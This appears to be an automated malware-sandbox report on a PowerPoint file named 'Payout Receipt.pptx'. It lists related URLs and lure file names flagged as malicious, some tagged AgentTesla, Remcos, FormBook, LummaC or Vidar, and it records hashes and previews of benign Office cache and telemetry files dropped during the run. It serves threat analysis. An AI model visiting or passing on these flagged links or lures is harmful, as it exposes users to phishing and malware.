                                                                                                                              https://www.ceolaser.com.mxGet hashmaliciousUnknownBrowse
                                                                                                                              • 4.175.87.197
                                                                                                                              • 20.190.159.2
                                                                                                                              https://test1web.edukati2.websku.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 4.175.87.197
                                                                                                                              • 20.190.159.2
                                                                                                                              http://url5892.equipgreen.com/ls/click?upn=u001.QnVyUTRnA6m7Ys04OcfRK-2BmYDxK-2BPvo2SH4SnTHtM2ahAlVLCP5CpZxqdikPch52bwE-2B6FGVTHUfa6r6g-2FUXtg-3D-3DRRNj_h5tndX3XP82u2CVP7HmVo4t-2FDkgNbuc-2FvPQxBNjqhqQfNFsb7fTdfgoFOkzI-2Bxa5KYPUiZS4W-2FgvgYDkntJEAhmsWMOHAu7qmcDzwEsnQtseb3y8TmhK-2BeBLagbYZa-2Fl5PaNGlzycBP9wt-2Bx-2BIF8M6H7XNSfHFanKHmI0XclVmtDLdFtwBZAykMNol-2B1EVQFYL6mFcaqBDNwcneuaiLfRiDR-2FpEOaIMkXlnRLaWty4mFpZlGkJkD2RATf5aYVpVmITUImq0A03rBAVtkq8oTcm0pf7AnRvvjfggEzQM-2FBDJTgvat7iExDFu-2FC1T1blavXJCuw6WT3ULqe7EEFzwLpISA11fryJZChsjBogHU4mmljbR7myqEHYvHOs-2BwDsboMOlR8BgyLszRlTVGoHnspaKXf-2BkOLcDw7PJIrD7-2FlwFq18AGU-2BMCwieNwipGZ43aaplrmL164T9c9GFx1PNH2NTQ8QQdXqSUL2c6Z6-2B1ninN2347XsTbH1kOcG-2Baj-2BmKRd-2BNrQ8HjKbgibY3if2Dc-2FillftKg-2BOAfAsCUg0buauclIIXkY9pJgbAiU0QED9OnFbExZCCtlYAvJNOed7N4zn56A55lVm-2FpSqvOehGwGBaKqQa4ttNoFB-2BYOeC0wYp71SC66lbF9C6FtGbF3Qpgus3-2BPuAKrmA6O2Su9CLsGxY9NfltTk4RJkxZjzDErPRMi6bSkxScSDRk90tJqNxYpDyXtYZlskKpQ4HdVrTPlGs8-2B-2FHPDDSgN-2BZxT1dhGovf81VbcvTPC13GKhBBaLTvYpomEVB24raM-2Fz7Xk5U-2B8zKTebMlP-2B767ISJjSJ4FsIMohGUw1oYLuomExXvt4SjzjZbOP9qyB9S-2BEqd7x6PZREvV2dm-2BJKbb6DwZmKWxW1lJB4QpPTNqpO9GdNhkZb7A-3D-3DGet hashmaliciousUnknownBrowse
                                                                                                                              • 4.175.87.197
                                                                                                                              • 20.190.159.2
                                                                                                                              https://indexconectada.net.br/Get hashmaliciousUnknownBrowse
                                                                                                                              • 4.175.87.197
                                                                                                                              • 20.190.159.2
                                                                                                                              https://app.collabow.io/d/GNgkdZO5gKluqEP3mMdbEwzWbgEyOeRe8sIh64SLMvsNGet hashmaliciousUnknownBrowse
                                                                                                                              • 4.175.87.197
                                                                                                                              • 20.190.159.2
                                                                                                                              6271f898ce5be7dd52b0fc260d0662b3Hollandco-File-871871493.pdfGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              c42oX67S73.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              https://ahchoadeegu.homes?u=k8pp605&o=c9ewtnr&t=8845Get hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              QT2Q1292300924.xla.xlsxGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              DHL Receipt_AWB 9892671327.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              Payment proof.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              MVR-00876 CARRARO ITALIA SPA.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              4DC70000.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              http://fpnc.vnvrff.com/Get hashmaliciousUnknownBrowse
                                                                                                                              • 2.23.209.133
                                                                                                                              3b5074b1b5d032e5620f69f9f700ff0eQUOTATIONS#08673.exeGet hashmaliciousAgentTeslaBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              file.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              rTCTdVVTSwCdqkFxlFIpU.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              WqZxLxZrOrnMWYaBaBKdLenVTu.ps1Get hashmaliciousUnknownBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              SWIFT 103 202406111301435660 110624-pdf.vbsGet hashmaliciousRemcosBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              yvDk2VZluODBu6S.exeGet hashmaliciousSnake Keylogger, VIP KeyloggerBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              TRANSFERENCIAS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              file.exeGet hashmaliciousCredential FlusherBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              QUOTATION_OCTQTRA071244PDF.scr.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              TRANSFERENCIAS.vbsGet hashmaliciousFormBookBrowse
                                                                                                                              • 13.107.5.88
                                                                                                                              a0e9f5d64349fb13191bc781f81f42e1setup.exeGet hashmaliciousUnknownBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              msvcp110.dllGet hashmaliciousLummaCBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              c7v62g0YpB.exeGet hashmaliciousSmokeLoaderBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              PO20241003.xlsGet hashmaliciousUnknownBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              file.exeGet hashmaliciousRDPWrap Tool, Amadey, Socks5Systemz, Stealc, Vidar, XmrigBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              file.exeGet hashmaliciousLummaC, VidarBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              Full-Setup.exeGet hashmaliciousLummaCBrowse
                                                                                                                              • 13.107.246.60
                                                                                                                              No context
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with very long lines (1869), with no line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1869
                                                                                                                              Entropy (8bit):5.091142390459905
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:48:cGndypdyrKdnzymrkSyrVinzyGDSyX9JdycTdSy8fASyr1JnzyxAdyrfMnzyO:vEpEGd23bI2cb/EUdboAbX2aEQ2O
                                                                                                                              MD5:4D35BC4EF3E92318F5FC93328CBACD80
                                                                                                                              SHA1:245DBA831B6A5F2A23CE5CEE33ED1889A9E74F99
                                                                                                                              SHA-256:4B767871E5BB03280A9E225358D963C7BF8ED98A68122819E083132BDFB398B0
                                                                                                                              SHA-512:A9138499DD1C41ED3C035C145A327234D570ECC75D4A9FD0BC677CCA0F13DA7C8B0D6DE44B1F3B2FF42533CFF77F3204FE4AA7ED4AD34AAC0AC5BB59F83F8459
                                                                                                                              Malicious:false
                                                                                                                              Reputation:low
                                                                                                                              Preview:<?xml version="1.0" encoding="UTF-8" standalone="yes"?><root><version>1</version><Count>12</Count><Resource><Id>Aptos_26215680</Id><LAT>2024-10-04T13:10:39Z</LAT><key>29939506207.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos_45876480</Id><LAT>2024-10-04T13:10:39Z</LAT><key>27160079615.ttf</key><folder>Aptos</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215680</Id><LAT>2024-10-04T13:10:38Z</LAT><key>23001069669.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_26215426</Id><LAT>2023-10-06T09:55:52Z</LAT><key>37262344671.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos Display_26215682</Id><LAT>2023-10-06T09:55:52Z</LAT><key>28367963232.ttf</key><folder>Aptos Display</folder><type>4</type></Resource><Resource><Id>Aptos Narrow_45876224</Id><LAT>2023-10-06T09:55:52Z</LAT><key>24153076628.ttf</key><folder>Aptos Narrow</folder><type>4</type></Resource><Resource><Id>Aptos_
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:JSON data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):521377
                                                                                                                              Entropy (8bit):4.9084889265453135
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3072:gdTb5Sb3F2FqSrfZm+CnQsbzxZO7aYb6f5780K2:wb5q3umBnzT
                                                                                                                              MD5:C37972CBD8748E2CA6DA205839B16444
                                                                                                                              SHA1:9834B46ACF560146DD7EE9086DB6019FBAC13B4E
                                                                                                                              SHA-256:D4CFBB0E8B9D3E36ECE921B9B51BD37EF1D3195A9CFA1C4586AEA200EB3434A7
                                                                                                                              SHA-512:02B4D134F84122B6EE9A304D79745A003E71803C354FB01BAF986BD15E3BA57BA5EF167CC444ED67B9BA5964FF5922C50E2E92A8A09862059852ECD9CEF1A900
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:{"MajorVersion":4,"MinorVersion":40,"Expiration":14,"Fonts":[{"a":[4294966911],"f":"Abadi","fam":[],"sf":[{"c":[1,0],"dn":"Abadi","fs":32696,"ful":[{"lcp":983041,"lsc":"Latn","ltx":"Abadi"}],"gn":"Abadi","id":"23643452060","p":[2,11,6,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":26215680},{"c":[1,0],"dn":"Abadi Extra Light","fs":22180,"ful":[{"lcp":983042,"lsc":"Latn","ltx":"Abadi Extra Light"}],"gn":"Abadi Extra Light","id":"17656736728","p":[2,11,2,4,2,1,4,2,2,4],"sub":[],"t":"ttf","u":[2147483651,0,0,0],"v":197263,"w":13108480}]},{"a":[4294966911],"f":"ADLaM Display","fam":[],"sf":[{"c":[536870913,0],"dn":"ADLaM Display Regular","fs":140072,"ful":[{"lcp":983040,"lsc":"Latn","ltx":"ADLaM Display"}],"gn":"ADLaM Display","id":"31965479471","p":[2,1,0,0,0,0,0,0,0,0],"sub":[],"t":"ttf","u":[2147491951,1107296330,0,0],"v":131072,"w":26215680}]},{"a":[4294966911],"f":"Agency FB","fam":[],"sf":[{"c":[536870913,0],"dn":"Agency FB Bold","fs":54372,"ful":[{"lcp":9830
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:TrueType Font data, 10 tables, 1st "OS/2", 7 names, Microsoft, language 0x409, \251 2018 Microsoft Corporation. All Rights Reserved.msofp_4_40RegularVersion 4.40;O365
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):773040
                                                                                                                              Entropy (8bit):6.55939673749297
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:Zn84XULLDs51UJQSOf9VvLXHyheIQ47gEFGHtAgk3+/cLQ/zhm1kjFKy6Nyjbqq+:N8XPDs5+ivOXgo1kYvyz2
                                                                                                                              MD5:4296A064B917926682E7EED650D4A745
                                                                                                                              SHA1:3953A6AA9100F652A6CA533C2E05895E52343718
                                                                                                                              SHA-256:E04E41C74D6C78213BA1588BACEE64B42C0EDECE85224C474A714F39960D8083
                                                                                                                              SHA-512:A25388DDCE58D9F06716C0F0BDF2AEFA7F68EBCA7171077533AF4A9BE99A08E3DCD8DFE1A278B7AA5DE65DA9F32501B4B0B0ECAB51F9AF0F12A3A8A75363FF2C
                                                                                                                              Malicious:false
                                                                                                                              Reputation:moderate, very likely benign file
                                                                                                                              Preview:........... OS/29....(...`cmap.s.,.......pglyf..&....|....head2..........6hheaE.@v.......$hmtx...........@loca.U.....8...Dmaxp........... name.P+........post...<...... .........b~1_.<...........<......r......Aa...................Q....Aa....Aa.........................~...................................................3..............................MS .@.......(...Q................. ...........d...........0...J.......8.......>..........+a..#...,................................................/...K.......z...............N......*...!...-...+........z.......h..%^..3...&j..+...+%..'R..+..."....................k......$A...,.......g...&...=.......X..&........*......&....B..(B...............#.......j...............+...P...5...@...)..........#...)Q...............*...{.. ....?..'...#....N...7......<...;>.............. ]...........5......#....s.......$.......$.......^..................+...>....H.......%...7.......6.......O...V...........K......"........c...N......!...............$...&...*p..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):32768
                                                                                                                              Entropy (8bit):0.0
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3::
                                                                                                                              MD5:BB7DF04E1B0A2570657527A7E108AE23
                                                                                                                              SHA1:5188431849B4613152FD7BDBA6A3FF0A4FD6424B
                                                                                                                              SHA-256:C35020473AED1B4642CD726CAD727B63FFF2824AD68CEDD7FFB73C7CBD890479
                                                                                                                              SHA-512:768007E06B0CD9E62D50F458B9435C6DDA0A6D272F0B15550F97C478394B743331C3A9C9236E09AB5B9CB3B423B2320A5D66EB3C7068DB9EA37891CA40E47012
                                                                                                                              Malicious:false
                                                                                                                              Reputation:high, very likely benign file
                                                                                                                              Preview:........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:data
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):91
                                                                                                                              Entropy (8bit):5.165017571051138
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:3:10tnknoliL1SJAHuOsHVWW+Wl111LRydjVlfd+vs:10tnB+IJAOOsHvRt1gFkvs
                                                                                                                              MD5:EA6B4A6D5A4589D612192775A5D3C271
                                                                                                                              SHA1:FF5D8C3686EB4C15B007392ECCB97FFA37F295CB
                                                                                                                              SHA-256:70F9F7F9A2ADC25B879935B2CC30FC61821EAEFADCDE758671954AEE1BBDB061
                                                                                                                              SHA-512:3F3FEA3B179CB853FE86DD68550E7F1BFBB4F9E01656FF4862FE6604AEFB42DCCDB8160282D9D486FC92A61CC416ED8129B271EFC244E88557872DD1BACF0F1B
                                                                                                                              Malicious:false
                                                                                                                              Preview:S.W..3Q....O..B9NF........... file:///C:\Users\user\Desktop\..Payout%20Receipt..pptx.....
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):177810
                                                                                                                              Entropy (8bit):5.28720393760173
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:1536:Ri2XfRAqcbH41gwEwLe7HW8bM/o/NMdcAZl1p5ihs7EXXPEAD2Odavo:UCe7HW8bM/o/TXsk4o
                                                                                                                              MD5:4B4CBAD2E522DBBBF2C67DAD54DB0BFC
                                                                                                                              SHA1:E92EF8D55DBAA9435E8943B767484CAADCF486A1
                                                                                                                              SHA-256:209CC1CBE43E50AAFA41C529CDF9B33FF15FBC6953DDDAF1A1FC851A8B80EE21
                                                                                                                              SHA-512:D70EE89E35FA49B5FDB1886DCF97363F8DE52F15898D16E7444091A4FB7928975C1A22FED696583897A5267271AF781223C9EBE826AEBD1CE18CDD7CEEB6715E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<o:OfficeConfig xmlns:o="urn:schemas-microsoft-com:office:office">.. <o:services o:GenerationTime="2024-10-04T13:10:38">.. Build: 16.0.18124.40132-->.. <o:default>.. <o:ticket o:headerName="Authorization" o:headerValue="{}" />.. </o:default>.. <o:service o:name="Research">.. <o:url>https://word-edit.officeapps.live.com/we/rrdiscovery.ashx</o:url>.. </o:service>.. <o:service o:name="ORedir">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ORedirSSL">.. <o:url>https://o15.officeredir.microsoft.com/r</o:url>.. </o:service>.. <o:service o:name="ClViewClientHelpId" o:authentication="1">.. <o:url>https://[MAX.BaseHost]/client/results</o:url>.. <o:ticket o:policy="MBI_SSL_SHORT" o:idprovider="1" o:target="[MAX.AuthHost]" o:headerValue="Passport1.4 from-PP='{}&amp;p='" />.. <o:ticket o:idprovider="3" o:headerValue="Bearer {}" o:resourceId="[
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):1125410
                                                                                                                              Entropy (8bit):4.780025288688606
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12288:WOB4/zXrZJV0N8x5thr291gess3TylunXb:H4/w
                                                                                                                              MD5:7FF4FA506A38EAF12CA1D9DCC01774CA
                                                                                                                              SHA1:F1BDBB2F12741971F2E603D5083380CAFB318BC4
                                                                                                                              SHA-256:115729540EC8D5F986B63FAA59A071396F8366BE58FFB9803B4FBD9B445EC686
                                                                                                                              SHA-512:7B5AFFC1F977021F53514CE00454222AE1AA66EDB09B0B605CA0B652DAC89BA0C309BCE2FF08809033B2331E5AE536AEC9A755479859A9132F85B99BEA9E521F
                                                                                                                              Malicious:false
                                                                                                                              Preview:<Rules><R Id="150219" V="1" DC="SM" EN="Office.PowerPoint.PPT.TypingInLockedText" ATT="e97859101370486fbcb67f5a023da3fc-29b89831-2d28-4841-8fa6-338080fae3a4-7206" SP="CriticalBusinessImpact" DL="N" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bem1d" />.. <UTS T="2" Id="bbzi1" />.. </S>.. <C T="U32" I="0" O="false" N="TypingCount">.. <C>.. <S T="1" />.. </C>.. </C>.. <T>.. <S T="2" />.. </T>.. <ST>.. <S T="1" />.. </ST>..</R><R Id="170022" V="2" DC="SM" EN="Office.Graphics.GVisInkLoad" ATT="cfcfdb91c68c4329bb8b7cb7babb3cf7-e082c2f2-ef1d-427a-ac4d-b0b700afe7a7-7655" S="1" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="b8ipj" A="anui5" />.. <A T="2" E="TelemetryShutdown" />.. </S>.. <C T="B" I="0" O="false" N="ContainsInkStrokes">.. <O T="COALESCE">.. <L>.. <O T="EQ">.. <L>.. <U T="EqualsNull">.. <S T="1" F="TimeStamp100ns" />.. </U>.. </L>.. <R>.. <V V="false" T="B" /
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):489
                                                                                                                              Entropy (8bit):5.155248000155917
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdIGXyT9un8DWyZcAAwEerWzlVZ66yuzySNO2su:2dILvDb0wLrWzPr
                                                                                                                              MD5:414277D4E3F104F55B935AB02A9BA9BF
                                                                                                                              SHA1:B01DF5CDB8EFCE39DA23495581D18C4AA4B1EF84
                                                                                                                              SHA-256:B8F1C0D81E44F9FEAB83DC2749B7807121F9BF8AB6AE82C01F8077FC05CA3FE1
                                                                                                                              SHA-512:40E2853C1EB0D9D627932232617C2D76EFA999DB788E20F5C7945C708B925E8A62788ED7D0F3518E72E00072AD7910BB199E67C82EE3119ABBEB3F3BB5E651C2
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100042" V="2" DC="SM" EN="Office.UX.Desktop.OfficeTheme.App.Init" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="cm9y5" A="a24c8" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="OfficeTheme">.. <S T="1" F="OfficeTheme" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):517
                                                                                                                              Entropy (8bit):5.213185196410167
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdAXynO6un8DWyZcAApAQier0lVZ66yuzySNO2su:2dnlvDb0/r0Pr
                                                                                                                              MD5:E03148FECDFEA3BFD90CA19AA52AC2C1
                                                                                                                              SHA1:BB0D4CE260F8E7C2F28A5A4FECD4AFA8B653BE2F
                                                                                                                              SHA-256:6BBCCD4AEA9494B1FD31DE86E19B2634F3AC6E6C72506BCBFD5A5C849C67829C
                                                                                                                              SHA-512:4B784F62D17524D89C194A534EAA1EF5FE69D21E907C97BEFBAB5321591256EE3D6348C48963A9DD9E156352218A6A8126DD9F2E5B934C0BE0B77D5ECCC6498C
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100043" V="0" DC="SM" EN="Office.UX.Desktop.OfficeTheme.Changed.Through.UI" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="a24db" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="U32" I="1" O="false" N="OfficeTheme">.. <S T="1" F="OfficeTheme" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):457
                                                                                                                              Entropy (8bit):5.134868815976784
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdlZun8DWyZcAAwEerqlVZ6d7SyFNrlNO2su:2dlZvDb0wLrqP0HFF
                                                                                                                              MD5:B9B2CA56A048BDBFE74315BAC8FEFAF0
                                                                                                                              SHA1:2061D5AA8AC1B3DC17C2839600F16C8975A58740
                                                                                                                              SHA-256:3C4A4929450C661680E8B674867368D76A71AA0A5FE6B1541E0CAB2EAECC2F2D
                                                                                                                              SHA-512:E6625F4A0B10DF7E3B966C40F5AD8FFB605592BC5AA0E250270DDDE78C539F376094CD95455DAC093B10B64FFBD2C3E4C17ED49AC39D8D5414731CBBC0F1B2EF
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100068" V="2" DC="SM" EN="Office.UX.WhatsNewCantOpen" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbqss" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <C T="W" I="1" O="false" N="Reasons">.. <S T="1" F="Reasons" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):802
                                                                                                                              Entropy (8bit):4.792062686551037
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdW+un8DWyZcAApAQierAerVxlVZdv2pu+/WkmSP/k//nx2Nf/0//RthmMNOjz:2d3vDb0/rnrVxP2Y+7HSc
                                                                                                                              MD5:8279DE7A54DC506ED68199AC880C2920
                                                                                                                              SHA1:C81A8D12C2CB577FC2A89242C8F9E22D4F37C6FC
                                                                                                                              SHA-256:40AD004C81F69364A2017FD3B758DC4C7834BC47A4A1340BED54594AF13F5B58
                                                                                                                              SHA-512:312A10EC95F62BCC2C924BEB9EDB7979E0EB3F8BDF5352874EB9337D2E8ABC02F2CC852E1B9813300FC1E40BB73422F075F4B42839180F6D0D15A49F211AFA3E
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100069" V="1" DC="SM" EN="Office.UX.WhatsNewTimeOnScreen" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbqsl" />.. <UTS T="2" Id="bbqsm" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="2" F="TimeStamp100ns" />.. </C>.. <C T="I64" I="1" O="false" N="WhatsNewOnScreenTimeSec">.. <O T="DIV">.. <L>.. <O T="SUB">.. <L>.. <S T="2" F="TimeStamp100ns" />.. </L>.. <R>.. <S T="1" F="TimeStamp100ns" />.. </R>.. </O>.. </L>.. <R>.. <V V="10000000" T="U64" />.. </R>.. </O>.. </C>.. <T>.. <S T="2" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):410
                                                                                                                              Entropy (8bit):5.2896270378885895
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdtr5oun8DWyZcAApAQierglVZ6NO2su:2dtmvDb0/rgPQ
                                                                                                                              MD5:D6DAF9F991EB87EB13BE13E79B869750
                                                                                                                              SHA1:D6611509E67BE22A205CBF308A08ACD150C99FAA
                                                                                                                              SHA-256:4CD12BB7EED5FE69ACC9E7A1EE29515CAEE4C453AB088F765ACB304DC882227C
                                                                                                                              SHA-512:686C1BCB148009D1D09EC6C1AE55EDB5CF454E46BBC39BE1536B45084CA09D4C7ADDD4C840E4AEC34500E2B4E92061D06863FDD35C6DB836B921557713E33682
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100070" V="0" DC="SM" EN="Office.UX.WhatsNewButtonClick" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbqsq" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):416
                                                                                                                              Entropy (8bit):5.295531666329221
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHd3LqqNoun8DWyZcAApAQierplVZ6NO2su:2d3OqOvDb0/rpPQ
                                                                                                                              MD5:3DF0BABC8132291994D448B40582DB90
                                                                                                                              SHA1:3C346E6C4A0779268FE62A4F7DF16307AF1F73C1
                                                                                                                              SHA-256:6FB9BDDDA6B632428391FAFE9CE78D58CD0986B6571D8BB4C9691496070F3F19
                                                                                                                              SHA-512:B982FC0ABC579C69F542C8BBBA3F78592E81BBE32DAEDA2D54E7A0427B0406DF62C53D483118A818A47162C766DAD68A29C83893401897D4994B993990D40288
                                                                                                                              Malicious:false
                                                                                                                              Preview:<?xml version="1.0" encoding="utf-8"?>..<R Id="100071" V="0" DC="SM" EN="Office.UX.WhatsNewOnlineButtonClick" ATT="c4388c977297413bb054bad1acf0ade1-cc58e53e-f5a4-4f37-b0d2-9a8079e34420-6879" SP="CriticalBusinessImpact" DCa="PSU" xmlns="">.. <S>.. <UTS T="1" Id="bbqsr" />.. </S>.. <C T="FT" I="0" O="false" N="CollectionTime">.. <S T="1" F="TimeStamp100ns" />.. </C>.. <T>.. <S T="1" />.. </T>..</R>..
                                                                                                                              Process:C:\Program Files (x86)\Microsoft Office\root\Office16\POWERPNT.EXE
                                                                                                                              File Type:XML 1.0 document, ASCII text, with CRLF line terminators
                                                                                                                              Category:dropped
                                                                                                                              Size (bytes):500
                                                                                                                              Entropy (8bit):5.241422570005702
                                                                                                                              Encrypted:false
                                                                                                                              SSDEEP:12:TMHdWCun8DWyZcAApAQierKNqlVZ6dLJsNO2su:2dPvDb0/rKqP0W
                                                                                                                              MD5:B5F555AC798495BD8A6B4E254745EDA0
                                                                                                                              SHA1:C559E92D8618CA2F10E8734B77AFAFF25388F3FC
                                                                                                                              SHA-256:1C79426930C54765CB7B121361D58839DDDBCED8F37502FAB16903274414AB21
                                                                                                                              SHA-512:BF28AA7562613A4ADB9435701D58438AF3B2378D1BAF06394F4DE5805CC52628706A53D5AE3BCD4AAD12DCB6BE76EE7C533A9237113993450B2F2D8E62A5DE8A
                                                                                                                              Malicious:false
